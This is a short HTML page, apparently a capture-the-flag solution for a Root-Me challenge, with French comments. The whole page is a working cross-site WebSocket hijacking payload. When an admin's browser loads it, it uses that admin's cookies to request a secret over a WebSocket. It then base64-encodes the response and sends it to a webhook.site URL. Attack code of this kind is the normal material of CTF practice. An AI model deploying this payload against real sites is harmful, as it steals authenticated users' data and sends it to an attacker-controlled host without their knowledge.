<!DOCTYPE html>
<html>
<head><title>Pwned</title></head>
<body>
    <h1>Chargement en cours...</h1>
    <script>
        // 1. Connexion au WebSocket du challenge
        // Le navigateur de l'admin va utiliser ses cookies automatiquement
        var ws = new WebSocket("ws://ctf23.root-me.org/ws");

        ws.onopen = function() {
            // 2. On demande le secret
            ws.send("secret");
        };

        ws.onmessage = function(event) {
            // 3. On reçoit le flag
            var flag = event.data;
            
            // 4. On envoie le flag vers ton Webhook
            // J'ai mis ton URL ici :
            fetch("https://webhook.site/6a20dbc6-2e8f-4552-858f-600153062740?flag=" + btoa(flag));
        };
    </script>
</body>
</html>
